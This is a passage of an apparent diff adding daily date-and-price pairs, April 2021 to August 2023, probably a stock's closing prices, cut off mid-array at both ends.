+ "2021-04-07", + 321.8140563964844 + ], + [ + "2021-04-08", + 325.1717224121094 + ], + [ + "2021-04-09", + 327.1416931152344 + ], + [ + "2021-04-12", + 326.7147521972656 + ], + [ + "2021-04-13", + 330.5284729003906 + ], + [ + "2021-04-14", + 326.5594787597656 + ], + [ + "2021-04-15", + 331.5085754394531 + ], + [ + "2021-04-16", + 331.8968200683594 + ], + [ + "2021-04-19", + 328.8593444824219 + ], + [ + "2021-04-20", + 326.4623718261719 + ], + [ + "2021-04-21", + 329.25726318359375 + ], + [ + "2021-04-22", + 325.2882080078125 + ], + [ + "2021-04-23", + 329.3833923339844 + ], + [ + "2021-04-26", + 331.52801513671875 + ], + [ + "2021-04-27", + 330.0918273925781 + ], + [ + "2021-04-28", + 328.975830078125 + ], + [ + "2021-04-29", + 330.1597595214844 + ], + [ + "2021-04-30", + 327.9956359863281 + ], + [ + "2021-05-03", + 326.2489318847656 + ], + [ + "2021-05-04", + 320.37786865234375 + ], + [ + "2021-05-05", + 319.30059814453125 + ], + [ + "2021-05-06", + 321.707275390625 + ], + [ + "2021-05-07", + 324.3177490234375 + ], + [ + "2021-05-10", + 316.1272888183594 + ], + [ + "2021-05-11", + 315.69061279296875 + ], + [ + "2021-05-12", + 307.5196838378906 + ], + [ + "2021-05-13", + 309.8970947265625 + ], + [ + "2021-05-14", + 316.7386779785156 + ], + [ + "2021-05-17", + 314.8172607421875 + ], + [ + "2021-05-18", + 312.6920166015625 + ], + [ + "2021-05-19", + 313.05096435546875 + ], + [ + "2021-05-20", + 319.1064758300781 + ], + [ + "2021-05-21", + 317.3403015136719 + ], + [ + "2021-05-24", + 322.67779541015625 + ], + [ + "2021-05-25", + 323.1241149902344 + ], + [ + "2021-05-26", + 324.24981689453125 + ], + [ + "2021-05-27", + 323.03680419921875 + ], + [ + "2021-05-28", + 324.05572509765625 + ], + [ + "2021-06-01", + 322.978515625 + ], + [ + "2021-06-02", + 323.60931396484375 + ], + [ + "2021-06-03", + 320.2419738769531 + ], + [ + "2021-06-04", + 325.67633056640625 + ], + [ + "2021-06-07", + 326.64678955078125 + ], + [ + "2021-06-08", + 326.8020324707031 + ], + [ + "2021-06-09", + 326.879638671875 + ], + [ + "2021-06-10", + 330.2859191894531 + ], + [ + "2021-06-11", + 331.14959716796875 + ], + [ + "2021-06-14", + 334.3228454589844 + ], + [ + "2021-06-15", + 332.13946533203125 + ], + [ + "2021-06-16", + 330.9263916015625 + ], + [ + "2021-06-17", + 335.12835693359375 + ], + [ + "2021-06-18", + 332.49847412109375 + ], + [ + "2021-06-21", + 334.5649719238281 + ], + [ + "2021-06-22", + 337.68365478515625 + ], + [ + "2021-06-23", + 337.84881591796875 + ], + [ + "2021-06-24", + 339.9376525878906 + ], + [ + "2021-06-25", + 339.5198669433594 + ], + [ + "2021-06-28", + 343.64898681640625 + ], + [ + "2021-06-29", + 344.89263916015625 + ], + [ + "2021-06-30", + 344.3485107421875 + ], + [ + "2021-07-01", + 344.4845275878906 + ], + [ + "2021-07-02", + 348.4388427734375 + ], + [ + "2021-07-06", + 349.94464111328125 + ], + [ + "2021-07-07", + 350.68310546875 + ], + [ + "2021-07-08", + 348.5650939941406 + ], + [ + "2021-07-09", + 350.74139404296875 + ], + [ + "2021-07-12", + 352.11126708984375 + ], + [ + "2021-07-13", + 352.11126708984375 + ], + [ + "2021-07-14", + 352.7427978515625 + ], + [ + "2021-07-15", + 350.2652893066406 + ], + [ + "2021-07-16", + 347.4283752441406 + ], + [ + "2021-07-19", + 344.58172607421875 + ], + [ + "2021-07-20", + 348.58453369140625 + ], + [ + "2021-07-21", + 351.2757568359375 + ], + [ + "2021-07-22", + 353.59771728515625 + ], + [ + "2021-07-23", + 357.72686767578125 + ], + [ + "2021-07-26", + 358.00860595703125 + ], + [ + "2021-07-27", + 354.06402587890625 + ], + [ + "2021-07-28", + 355.4242248535156 + ], + [ + "2021-07-29", + 356.0557861328125 + ], + [ + "2021-07-30", + 354.2001037597656 + ], + [ + "2021-08-02", + 354.2293395996094 + ], + [ + "2021-08-03", + 356.3763732910156 + ], + [ + "2021-08-04", + 356.8913269042969 + ], + [ + "2021-08-05", + 359.1550598144531 + ], + [ + "2021-08-06", + 357.5810241699219 + ], + [ + "2021-08-09", + 358.2417907714844 + ], + [ + "2021-08-10", + 356.40557861328125 + ], + [ + "2021-08-11", + 355.7934875488281 + ], + [ + "2021-08-12", + 357.075927734375 + ], + [ + "2021-08-13", + 358.3291931152344 + ], + [ + "2021-08-16", + 358.4847106933594 + ], + [ + "2021-08-17", + 355.3271789550781 + ], + [ + "2021-08-18", + 351.9073181152344 + ], + [ + "2021-08-19", + 353.60748291015625 + ], + [ + "2021-08-20", + 357.27020263671875 + ], + [ + "2021-08-23", + 362.61383056640625 + ], + [ + "2021-08-24", + 363.7213439941406 + ], + [ + "2021-08-25", + 364.1391906738281 + ], + [ + "2021-08-26", + 361.8268737792969 + ], + [ + "2021-08-27", + 365.3438415527344 + ], + [ + "2021-08-30", + 369.44378662109375 + ], + [ + "2021-08-31", + 369.14263916015625 + ], + [ + "2021-09-01", + 369.7547607421875 + ], + [ + "2021-09-02", + 369.5798034667969 + ], + [ + "2021-09-03", + 370.7166442871094 + ], + [ + "2021-09-07", + 371.2411804199219 + ], + [ + "2021-09-08", + 369.948974609375 + ], + [ + "2021-09-09", + 368.6763000488281 + ], + [ + "2021-09-10", + 365.8782043457031 + ], + [ + "2021-09-13", + 365.62554931640625 + ], + [ + "2021-09-14", + 364.5860900878906 + ], + [ + "2021-09-15", + 367.2967224121094 + ], + [ + "2021-09-16", + 367.5492248535156 + ], + [ + "2021-09-17", + 363.19671630859375 + ], + [ + "2021-09-20", + 355.6918640136719 + ], + [ + "2021-09-21", + 356.12957763671875 + ], + [ + "2021-09-22", + 359.45599365234375 + ], + [ + "2021-09-23", + 362.7726135253906 + ], + [ + "2021-09-24", + 363.1130676269531 + ], + [ + "2021-09-27", + 360.2146301269531 + ], + [ + "2021-09-28", + 350.02142333984375 + ], + [ + "2021-09-29", + 349.44757080078125 + ], + [ + "2021-09-30", + 348.1637268066406 + ], + [ + "2021-10-01", + 350.3229675292969 + ], + [ + "2021-10-04", + 342.9698181152344 + ], + [ + "2021-10-05", + 347.59967041015625 + ], + [ + "2021-10-06", + 349.826904296875 + ], + [ + "2021-10-07", + 353.03662109375 + ], + [ + "2021-10-08", + 351.2761535644531 + ], + [ + "2021-10-11", + 348.58197021484375 + ], + [ + "2021-10-12", + 347.3662414550781 + ], + [ + "2021-10-13", + 350.1478271484375 + ], + [ + "2021-10-14", + 356.596435546875 + ], + [ + "2021-10-15", + 358.84320068359375 + ], + [ + "2021-10-18", + 362.4516296386719 + ], + [ + "2021-10-19", + 365.1944580078125 + ], + [ + "2021-10-20", + 364.7179260253906 + ], + [ + "2021-10-21", + 366.9452209472656 + ], + [ + "2021-10-22", + 363.8619079589844 + ], + [ + "2021-10-25", + 367.5871887207031 + ], + [ + "2021-10-26", + 368.74456787109375 + ], + [ + "2021-10-27", + 369.6004943847656 + ], + [ + "2021-10-28", + 373.70501708984375 + ], + [ + "2021-10-29", + 375.54327392578125 + ], + [ + "2021-11-01", + 376.8271484375 + ], + [ + "2021-11-02", + 378.40283203125 + ], + [ + "2021-11-03", + 382.41986083984375 + ], + [ + "2021-11-04", + 387.3219299316406 + ], + [ + "2021-11-05", + 387.69146728515625 + ], + [ + "2021-11-08", + 387.16619873046875 + ], + [ + "2021-11-09", + 384.5012512207031 + ], + [ + "2021-11-10", + 378.85028076171875 + ], + [ + "2021-11-11", + 379.9007568359375 + ], + [ + "2021-11-12", + 383.8982849121094 + ], + [ + "2021-11-15", + 383.81072998046875 + ], + [ + "2021-11-16", + 386.5438537597656 + ], + [ + "2021-11-17", + 386.7480163574219 + ], + [ + "2021-11-18", + 390.7553405761719 + ], + [ + "2021-11-19", + 392.9339599609375 + ], + [ + "2021-11-22", + 388.37237548828125 + ], + [ + "2021-11-23", + 386.60211181640625 + ], + [ + "2021-11-24", + 387.8471984863281 + ], + [ + "2021-11-26", + 380.4940490722656 + ], + [ + "2021-11-29", + 388.7516784667969 + ], + [ + "2021-11-30", + 383.04229736328125 + ], + [ + "2021-12-01", + 376.5256652832031 + ], + [ + "2021-12-02", + 379.23931884765625 + ], + [ + "2021-12-03", + 372.6449890136719 + ], + [ + "2021-12-06", + 375.6308288574219 + ], + [ + "2021-12-07", + 386.942626953125 + ], + [ + "2021-12-08", + 388.6737976074219 + ], + [ + "2021-12-09", + 382.9547424316406 + ], + [ + "2021-12-10", + 387.11761474609375 + ], + [ + "2021-12-13", + 381.5249938964844 + ], + [ + "2021-12-14", + 377.576171875 + ], + [ + "2021-12-15", + 386.1838684082031 + ], + [ + "2021-12-16", + 376.2532958984375 + ], + [ + "2021-12-17", + 374.3760986328125 + ], + [ + "2021-12-20", + 370.74462890625 + ], + [ + "2021-12-21", + 379.0419006347656 + ], + [ + "2021-12-22", + 383.658203125 + ], + [ + "2021-12-23", + 386.55059814453125 + ], + [ + "2021-12-27", + 392.9392395019531 + ], + [ + "2021-12-28", + 391.1180725097656 + ], + [ + "2021-12-29", + 391.05963134765625 + ], + [ + "2021-12-30", + 389.8910217285156 + ], + [ + "2021-12-31", + 387.456298828125 + ], + [ + "2022-01-03", + 391.1861572265625 + ], + [ + "2022-01-04", + 386.1123352050781 + ], + [ + "2022-01-05", + 374.2505187988281 + ], + [ + "2022-01-06", + 373.987548828125 + ], + [ + "2022-01-07", + 369.936279296875 + ], + [ + "2022-01-10", + 370.1797790527344 + ], + [ + "2022-01-11", + 375.74053955078125 + ], + [ + "2022-01-12", + 377.2305603027344 + ], + [ + "2022-01-13", + 367.793701171875 + ], + [ + "2022-01-14", + 370.0823974609375 + ], + [ + "2022-01-18", + 360.8694763183594 + ], + [ + "2022-01-19", + 356.9058532714844 + ], + [ + "2022-01-20", + 352.2701110839844 + ], + [ + "2022-01-21", + 342.502197265625 + ], + [ + "2022-01-24", + 344.07025146484375 + ], + [ + "2022-01-25", + 336.09405517578125 + ], + [ + "2022-01-26", + 335.5682678222656 + ], + [ + "2022-01-27", + 332.1888122558594 + ], + [ + "2022-01-28", + 342.60931396484375 + ], + [ + "2022-01-31", + 353.5654296875 + ], + [ + "2022-02-01", + 355.97088623046875 + ], + [ + "2022-02-02", + 358.8632507324219 + ], + [ + "2022-02-03", + 344.3136291503906 + ], + [ + "2022-02-04", + 348.6571044921875 + ], + [ + "2022-02-07", + 345.8523864746094 + ], + [ + "2022-02-08", + 349.73809814453125 + ], + [ + "2022-02-09", + 357.1492614746094 + ], + [ + "2022-02-10", + 349.0661315917969 + ], + [ + "2022-02-11", + 337.9931335449219 + ], + [ + "2022-02-14", + 338.4118957519531 + ], + [ + "2022-02-15", + 346.82623291015625 + ], + [ + "2022-02-16", + 346.738525390625 + ], + [ + "2022-02-17", + 336.42529296875 + ], + [ + "2022-02-18", + 332.588134765625 + ], + [ + "2022-02-22", + 329.24774169921875 + ], + [ + "2022-02-23", + 320.8139953613281 + ], + [ + "2022-02-24", + 331.5948181152344 + ], + [ + "2022-02-25", + 336.7368469238281 + ], + [ + "2022-02-28", + 337.73992919921875 + ], + [ + "2022-03-01", + 332.5686340332031 + ], + [ + "2022-03-02", + 338.1490173339844 + ], + [ + "2022-03-03", + 333.318603515625 + ], + [ + "2022-03-04", + 328.4881896972656 + ], + [ + "2022-03-07", + 316.373046875 + ], + [ + "2022-03-08", + 314.902587890625 + ], + [ + "2022-03-09", + 326.2384338378906 + ], + [ + "2022-03-10", + 322.6156005859375 + ], + [ + "2022-03-11", + 315.9250793457031 + ], + [ + "2022-03-14", + 309.85797119140625 + ], + [ + "2022-03-15", + 319.5771484375 + ], + [ + "2022-03-16", + 331.4293518066406 + ], + [ + "2022-03-17", + 335.44158935546875 + ], + [ + "2022-03-18", + 342.307373046875 + ], + [ + "2022-03-21", + 341.355712890625 + ], + [ + "2022-03-22", + 348.0643615722656 + ], + [ + "2022-03-23", + 343.06207275390625 + ], + [ + "2022-03-24", + 350.68719482421875 + ], + [ + "2022-03-25", + 350.3946838378906 + ], + [ + "2022-03-28", + 355.8161315917969 + ], + [ + "2022-03-29", + 361.9396667480469 + ], + [ + "2022-03-30", + 357.9418640136719 + ], + [ + "2022-03-31", + 353.50518798828125 + ], + [ + "2022-04-01", + 352.8324890136719 + ], + [ + "2022-04-04", + 360.0967712402344 + ], + [ + "2022-04-05", + 352.1011047363281 + ], + [ + "2022-04-06", + 344.4564514160156 + ], + [ + "2022-04-07", + 345.27557373046875 + ], + [ + "2022-04-08", + 340.44891357421875 + ], + [ + "2022-04-11", + 332.3948059082031 + ], + [ + "2022-04-12", + 330.9906311035156 + ], + [ + "2022-04-13", + 337.71868896484375 + ], + [ + "2022-04-14", + 329.99609375 + ], + [ + "2022-04-18", + 330.2496032714844 + ], + [ + "2022-04-19", + 337.6309509277344 + ], + [ + "2022-04-20", + 332.7068176269531 + ], + [ + "2022-04-21", + 325.8227844238281 + ], + [ + "2022-04-22", + 317.2908020019531 + ], + [ + "2022-04-25", + 321.3666687011719 + ], + [ + "2022-04-26", + 309.2366638183594 + ], + [ + "2022-04-27", + 308.86614990234375 + ], + [ + "2022-04-28", + 319.8357238769531 + ], + [ + "2022-04-29", + 305.4435729980469 + ], + [ + "2022-05-02", + 310.543212890625 + ], + [ + "2022-05-03", + 310.8747863769531 + ], + [ + "2022-05-04", + 321.3861083984375 + ], + [ + "2022-05-05", + 305.1997985839844 + ], + [ + "2022-05-06", + 301.54327392578125 + ], + [ + "2022-05-09", + 289.74481201171875 + ], + [ + "2022-05-10", + 293.2648010253906 + ], + [ + "2022-05-11", + 284.5671691894531 + ], + [ + "2022-05-12", + 283.8943176269531 + ], + [ + "2022-05-13", + 294.41546630859375 + ], + [ + "2022-05-16", + 291.00262451171875 + ], + [ + "2022-05-17", + 298.53997802734375 + ], + [ + "2022-05-18", + 283.88458251953125 + ], + [ + "2022-05-19", + 282.36346435546875 + ], + [ + "2022-05-20", + 281.48583984375 + ], + [ + "2022-05-23", + 286.166259765625 + ], + [ + "2022-05-24", + 280.0817565917969 + ], + [ + "2022-05-25", + 284.0016174316406 + ], + [ + "2022-05-26", + 291.8704833984375 + ], + [ + "2022-05-27", + 301.39697265625 + ], + [ + "2022-05-31", + 300.597412109375 + ], + [ + "2022-06-01", + 298.374267578125 + ], + [ + "2022-06-02", + 306.54541015625 + ], + [ + "2022-06-03", + 298.5693054199219 + ], + [ + "2022-06-06", + 299.5638122558594 + ], + [ + "2022-06-07", + 302.1478576660156 + ], + [ + "2022-06-08", + 299.9733581542969 + ], + [ + "2022-06-09", + 291.9387512207031 + ], + [ + "2022-06-10", + 281.6418762207031 + ], + [ + "2022-06-13", + 268.54656982421875 + ], + [ + "2022-06-14", + 269.0340881347656 + ], + [ + "2022-06-15", + 275.7524108886719 + ], + [ + "2022-06-16", + 264.6268005371094 + ], + [ + "2022-06-17", + 267.8445129394531 + ], + [ + "2022-06-21", + 274.60211181640625 + ], + [ + "2022-06-22", + 274.20166015625 + ], + [ + "2022-06-23", + 278.2851867675781 + ], + [ + "2022-06-24", + 287.8202819824219 + ], + [ + "2022-06-27", + 285.71002197265625 + ], + [ + "2022-06-28", + 277.00543212890625 + ], + [ + "2022-06-29", + 277.25946044921875 + ], + [ + "2022-06-30", + 273.820556640625 + ], + [ + "2022-07-01", + 275.6278991699219 + ], + [ + "2022-07-05", + 280.3465576171875 + ], + [ + "2022-07-06", + 282.1441955566406 + ], + [ + "2022-07-07", + 288.1817932128906 + ], + [ + "2022-07-08", + 288.5432434082031 + ], + [ + "2022-07-11", + 282.378662109375 + ], + [ + "2022-07-12", + 279.6431579589844 + ], + [ + "2022-07-13", + 279.0667724609375 + ], + [ + "2022-07-14", + 280.06329345703125 + ], + [ + "2022-07-15", + 285.1434326171875 + ], + [ + "2022-07-18", + 282.7303771972656 + ], + [ + "2022-07-19", + 291.4253234863281 + ], + [ + "2022-07-20", + 296.0462341308594 + ], + [ + "2022-07-21", + 300.2960510253906 + ], + [ + "2022-07-22", + 295.0302429199219 + ], + [ + "2022-07-25", + 293.3498229980469 + ], + [ + "2022-07-26", + 287.58575439453125 + ], + [ + "2022-07-27", + 299.7391357421875 + ], + [ + "2022-07-28", + 302.66998291015625 + ], + [ + "2022-07-29", + 308.1897888183594 + ], + [ + "2022-08-01", + 308.0041198730469 + ], + [ + "2022-08-02", + 307.08587646484375 + ], + [ + "2022-08-03", + 315.4485778808594 + ], + [ + "2022-08-04", + 316.9237365722656 + ], + [ + "2022-08-05", + 314.3348083496094 + ], + [ + "2022-08-08", + 313.3187561035156 + ], + [ + "2022-08-09", + 309.77239990234375 + ], + [ + "2022-08-10", + 318.4184875488281 + ], + [ + "2022-08-11", + 316.611083984375 + ], + [ + "2022-08-12", + 322.77569580078125 + ], + [ + "2022-08-15", + 325.3841857910156 + ], + [ + "2022-08-16", + 324.62213134765625 + ], + [ + "2022-08-17", + 320.9195251464844 + ], + [ + "2022-08-18", + 321.6913146972656 + ], + [ + "2022-08-19", + 315.4192199707031 + ], + [ + "2022-08-22", + 307.1151123046875 + ], + [ + "2022-08-23", + 306.86114501953125 + ], + [ + "2022-08-24", + 307.7501220703125 + ], + [ + "2022-08-25", + 313.19183349609375 + ], + [ + "2022-08-26", + 300.3546142578125 + ], + [ + "2022-08-29", + 297.3944396972656 + ], + [ + "2022-08-30", + 294.08251953125 + ], + [ + "2022-08-31", + 292.3728332519531 + ], + [ + "2022-09-01", + 292.4998779296875 + ], + [ + "2022-09-02", + 288.367431640625 + ], + [ + "2022-09-06", + 286.2962646484375 + ], + [ + "2022-09-07", + 292.079833984375 + ], + [ + "2022-09-08", + 293.5940856933594 + ], + [ + "2022-09-09", + 300.0126647949219 + ], + [ + "2022-09-12", + 303.57855224609375 + ], + [ + "2022-09-13", + 286.9313049316406 + ], + [ + "2022-09-14", + 289.2075500488281 + ], + [ + "2022-09-15", + 284.3912048339844 + ], + [ + "2022-09-16", + 282.65216064453125 + ], + [ + "2022-09-19", + 284.85333251953125 + ], + [ + "2022-09-20", + 282.5827331542969 + ], + [ + "2022-09-21", + 277.52276611328125 + ], + [ + "2022-09-22", + 274.10711669921875 + ], + [ + "2022-09-23", + 269.6441955566406 + ], + [ + "2022-09-26", + 268.5284423828125 + ], + [ + "2022-09-27", + 268.6361389160156 + ], + [ + "2022-09-28", + 273.97991943359375 + ], + [ + "2022-09-29", + 266.0817565917969 + ], + [ + "2022-09-30", + 261.56982421875 + ], + [ + "2022-10-03", + 267.7063903808594 + ], + [ + "2022-10-04", + 276.1231994628906 + ], + [ + "2022-10-05", + 275.9764404296875 + ], + [ + "2022-10-06", + 273.8036804199219 + ], + [ + "2022-10-07", + 263.3706359863281 + ], + [ + "2022-10-10", + 260.7379455566406 + ], + [ + "2022-10-11", + 257.1558532714844 + ], + [ + "2022-10-12", + 257.0677795410156 + ], + [ + "2022-10-13", + 263.09661865234375 + ], + [ + "2022-10-14", + 255.18862915039062 + ], + [ + "2022-10-17", + 263.6153259277344 + ], + [ + "2022-10-18", + 265.70001220703125 + ], + [ + "2022-10-19", + 264.73101806640625 + ], + [ + "2022-10-20", + 263.38043212890625 + ], + [ + "2022-10-21", + 269.5561828613281 + ], + [ + "2022-10-24", + 272.5215759277344 + ], + [ + "2022-10-25", + 278.1589660644531 + ], + [ + "2022-10-26", + 272.01263427734375 + ], + [ + "2022-10-27", + 267.0603942871094 + ], + [ + "2022-10-28", + 275.2326354980469 + ], + [ + "2022-10-31", + 272.0322265625 + ], + [ + "2022-11-01", + 269.2526550292969 + ], + [ + "2022-11-02", + 260.0234680175781 + ], + [ + "2022-11-03", + 254.94403076171875 + ], + [ + "2022-11-04", + 259.04473876953125 + ], + [ + "2022-11-07", + 261.892822265625 + ], + [ + "2022-11-08", + 263.8013000488281 + ], + [ + "2022-11-09", + 257.71368408203125 + ], + [ + "2022-11-10", + 276.72998046875 + ], + [ + "2022-11-11", + 281.8291320800781 + ], + [ + "2022-11-14", + 279.36279296875 + ], + [ + "2022-11-15", + 283.2287292480469 + ], + [ + "2022-11-16", + 279.36279296875 + ], + [ + "2022-11-17", + 278.7462158203125 + ], + [ + "2022-11-18", + 278.7559509277344 + ], + [ + "2022-11-21", + 275.88836669921875 + ], + [ + "2022-11-22", + 279.8619384765625 + ], + [ + "2022-11-23", + 282.67083740234375 + ], + [ + "2022-11-25", + 280.8113098144531 + ], + [ + "2022-11-28", + 276.6908874511719 + ], + [ + "2022-11-29", + 274.5965270996094 + ], + [ + "2022-11-30", + 287.1141052246094 + ], + [ + "2022-12-01", + 287.46649169921875 + ], + [ + "2022-12-02", + 286.3213806152344 + ], + [ + "2022-12-05", + 281.51593017578125 + ], + [ + "2022-12-06", + 275.682861328125 + ], + [ + "2022-12-07", + 274.5573425292969 + ], + [ + "2022-12-08", + 277.80657958984375 + ], + [ + "2022-12-09", + 276.0351257324219 + ], + [ + "2022-12-12", + 279.4998779296875 + ], + [ + "2022-12-13", + 282.50445556640625 + ], + [ + "2022-12-14", + 280.4100036621094 + ], + [ + "2022-12-15", + 270.9947814941406 + ], + [ + "2022-12-16", + 268.4110107421875 + ], + [ + "2022-12-19", + 264.6388854980469 + ], + [ + "2022-12-20", + 264.432861328125 + ], + [ + "2022-12-21", + 268.268798828125 + ], + [ + "2022-12-22", + 261.7055358886719 + ], + [ + "2022-12-23", + 262.2940979003906 + ], + [ + "2022-12-27", + 258.5857238769531 + ], + [ + "2022-12-28", + 255.17169189453125 + ], + [ + "2022-12-29", + 261.3916320800781 + ], + [ + "2022-12-30", + 261.234619140625 + ], + [ + "2023-01-03", + 259.46875 + ], + [ + "2023-01-04", + 260.7048034667969 + ], + [ + "2023-01-05", + 256.6236572265625 + ], + [ + "2023-01-06", + 263.7068786621094 + ], + [ + "2023-01-09", + 265.4139404296875 + ], + [ + "2023-01-10", + 267.66046142578125 + ], + [ + "2023-01-11", + 272.2910461425781 + ], + [ + "2023-01-12", + 273.76263427734375 + ], + [ + "2023-01-13", + 275.64630126953125 + ], + [ + "2023-01-17", + 276.2055358886719 + ], + [ + "2023-01-18", + 272.6148376464844 + ], + [ + "2023-01-19", + 269.9365539550781 + ], + [ + "2023-01-20", + 277.3238830566406 + ], + [ + "2023-01-23", + 283.48486328125 + ], + [ + "2023-01-24", + 282.9060363769531 + ], + [ + "2023-01-25", + 282.2781982421875 + ], + [ + "2023-01-26", + 287.7818603515625 + ], + [ + "2023-01-27", + 290.6466064453125 + ], + [ + "2023-01-30", + 284.77001953125 + ], + [ + "2023-01-31", + 289.03765869140625 + ], + [ + "2023-02-01", + 295.21826171875 + ], + [ + "2023-02-02", + 305.8135986328125 + ], + [ + "2023-02-03", + 300.37860107421875 + ], + [ + "2023-02-06", + 297.8376770019531 + ], + [ + "2023-02-07", + 304.0084533691406 + ], + [ + "2023-02-08", + 298.6028747558594 + ], + [ + "2023-02-09", + 295.9638671875 + ], + [ + "2023-02-10", + 294.0214538574219 + ], + [ + "2023-02-13", + 298.73040771484375 + ], + [ + "2023-02-14", + 300.93780517578125 + ], + [ + "2023-02-15", + 303.2432861328125 + ], + [ + "2023-02-16", + 297.55322265625 + ], + [ + "2023-02-17", + 295.4537048339844 + ], + [ + "2023-02-21", + 288.45880126953125 + ], + [ + "2023-02-22", + 288.67462158203125 + ], + [ + "2023-02-23", + 291.19598388671875 + ], + [ + "2023-02-24", + 286.32012939453125 + ], + [ + "2023-02-27", + 288.3704833984375 + ], + [ + "2023-02-28", + 287.99774169921875 + ], + [ + "2023-03-01", + 285.68243408203125 + ], + [ + "2023-03-02", + 288.0467529296875 + ], + [ + "2023-03-03", + 294.0018310546875 + ], + [ + "2023-03-06", + 294.3352966308594 + ], + [ + "2023-03-07", + 290.7251281738281 + ], + [ + "2023-03-08", + 292.17706298828125 + ], + [ + "2023-03-09", + 287.11474609375 + ], + [ + "2023-03-10", + 283.0826110839844 + ], + [ + "2023-03-13", + 285.18206787109375 + ], + [ + "2023-03-14", + 291.7355041503906 + ], + [ + "2023-03-15", + 293.26593017578125 + ], + [ + "2023-03-16", + 300.9966735839844 + ], + [ + "2023-03-17", + 299.5741271972656 + ], + [ + "2023-03-20", + 300.6372985839844 + ], + [ + "2023-03-21", + 304.93109130859375 + ], + [ + "2023-03-22", + 300.78472900390625 + ], + [ + "2023-03-23", + 304.3514404296875 + ], + [ + "2023-03-24", + 305.4715881347656 + ], + [ + "2023-03-27", + 303.3786926269531 + ], + [ + "2023-03-28", + 301.76727294921875 + ], + [ + "2023-03-29", + 307.2696838378906 + ], + [ + "2023-03-30", + 310.1780700683594 + ], + [ + "2023-03-31", + 315.33660888671875 + ], + [ + "2023-04-03", + 314.5701599121094 + ], + [ + "2023-04-04", + 313.50897216796875 + ], + [ + "2023-04-05", + 310.41387939453125 + ], + [ + "2023-04-06", + 312.5067138671875 + ], + [ + "2023-04-10", + 312.3298645019531 + ], + [ + "2023-04-11", + 310.325439453125 + ], + [ + "2023-04-12", + 307.5841064453125 + ], + [ + "2023-04-13", + 313.6072692871094 + ], + [ + "2023-04-14", + 313.0176696777344 + ], + [ + "2023-04-17", + 313.282958984375 + ], + [ + "2023-04-18", + 313.3026123046875 + ], + [ + "2023-04-19", + 313.1552734375 + ], + [ + "2023-04-20", + 310.7676086425781 + ], + [ + "2023-04-21", + 311.0918273925781 + ], + [ + "2023-04-24", + 310.4433288574219 + ], + [ + "2023-04-25", + 304.58721923828125 + ], + [ + "2023-04-26", + 306.43450927734375 + ], + [ + "2023-04-27", + 314.7667236328125 + ], + [ + "2023-04-28", + 316.9381408691406 + ], + [ + "2023-05-01", + 316.5745849609375 + ], + [ + "2023-05-02", + 313.8135681152344 + ], + [ + "2023-05-03", + 311.760009765625 + ], + [ + "2023-05-04", + 310.6595764160156 + ], + [ + "2023-05-05", + 317.26239013671875 + ], + [ + "2023-05-08", + 318.0484619140625 + ], + [ + "2023-05-09", + 316.0342102050781 + ], + [ + "2023-05-10", + 319.47320556640625 + ], + [ + "2023-05-11", + 320.51470947265625 + ], + [ + "2023-05-12", + 319.3650817871094 + ], + [ + "2023-05-15", + 321.094482421875 + ], + [ + "2023-05-16", + 321.45794677734375 + ], + [ + "2023-05-17", + 325.3489685058594 + ], + [ + "2023-05-18", + 331.3917236328125 + ], + [ + "2023-05-19", + 330.6449890136719 + ], + [ + "2023-05-22", + 331.7554016113281 + ], + [ + "2023-05-23", + 327.54986572265625 + ], + [ + "2023-05-24", + 325.86968994140625 + ], + [ + "2023-05-25", + 333.7991027832031 + ], + [ + "2023-05-26", + 342.32781982421875 + ], + [ + "2023-05-30", + 343.8802795410156 + ], + [ + "2023-05-31", + 341.92498779296875 + ], + [ + "2023-06-01", + 345.8749084472656 + ], + [ + "2023-06-02", + 348.4688415527344 + ], + [ + "2023-06-05", + 348.7144775390625 + ], + [ + "2023-06-06", + 348.655517578125 + ], + [ + "2023-06-07", + 342.74053955078125 + ], + [ + "2023-06-08", + 346.9950256347656 + ], + [ + "2023-06-09", + 348.32147216796875 + ], + [ + "2023-06-12", + 354.2070617675781 + ], + [ + "2023-06-13", + 356.9287414550781 + ], + [ + "2023-06-14", + 359.522705078125 + ], + [ + "2023-06-15", + 363.80682373046875 + ], + [ + "2023-06-16", + 361.5174255371094 + ], + [ + "2023-06-20", + 360.9998779296875 + ], + [ + "2023-06-21", + 356.0803527832031 + ], + [ + "2023-06-22", + 360.2816467285156 + ], + [ + "2023-06-23", + 356.7099914550781 + ], + [ + "2023-06-26", + 351.9281311035156 + ], + [ + "2023-06-27", + 357.97918701171875 + ], + [ + "2023-06-28", + 358.67779541015625 + ], + [ + "2023-06-29", + 357.9595031738281 + ], + [ + "2023-06-30", + 363.4793701171875 + ], + [ + "2023-07-03", + 364.3353271484375 + ], + [ + "2023-07-05", + 364.32550048828125 + ], + [ + "2023-07-06", + 361.5508117675781 + ], + [ + "2023-07-07", + 360.3504638671875 + ], + [ + "2023-07-10", + 360.4684753417969 + ], + [ + "2023-07-11", + 362.2494812011719 + ], + [ + "2023-07-12", + 366.82470703125 + ], + [ + "2023-07-13", + 373.0528259277344 + ], + [ + "2023-07-14", + 372.97418212890625 + ], + [ + "2023-07-17", + 376.45721435546875 + ], + [ + "2023-07-18", + 379.536865234375 + ], + [ + "2023-07-19", + 379.4483337402344 + ], + [ + "2023-07-20", + 370.7012939453125 + ], + [ + "2023-07-21", + 369.5894775390625 + ], + [ + "2023-07-24", + 370.1798400878906 + ], + [ + "2023-07-25", + 372.6888427734375 + ], + [ + "2023-07-26", + 371.4490966796875 + ], + [ + "2023-07-27", + 370.56353759765625 + ], + [ + "2023-07-28", + 377.3132629394531 + ], + [ + "2023-07-31", + 377.510009765625 + ], + [ + "2023-08-01", + 376.63433837890625 + ], + [ + "2023-08-02", + 368.36944580078125 + ], + [ + "2023-08-03", + 367.779052734375 + ], + [ + "2023-08-04", + 366.05718994140625 + ], + [ + "2023-08-07", + 369.156494140625 + ], + [ + "2023-08-08", + 366.01788330078125 + ], + [ + "2023-08-09", + 361.99359130859375 + ], + [ + "2023-08-10", + 362.6626892089844 + ], + [ + "2023-08-11", + 360.3504638671875 + ], + [ + "2023-08-14", + 364.3943786621094 + ], + [ + "2023-08-15", + 360.5276184082031 + ], + [ + "2023-08-16", + 356.7099914550781 + ], + [ + "2023-08-17", + 352.81365966796875 + ], + [ + "2023-08-18", + 352.37091064453125 + ], + [ + "2023-08-21", + 358.04815673828125 + ], + [ + "2023-08-22", + 357.5364685058594 + ], + [ + "2023-08-23", + 363.1742858886719 + ], + [ + "2023-08-24", + 355.41119384765625 + ], + [ + "2023-08-25", + 358.1661682128906 + ], + [ + "2023-08-28", + 360.8620910644531 + ], + [ + 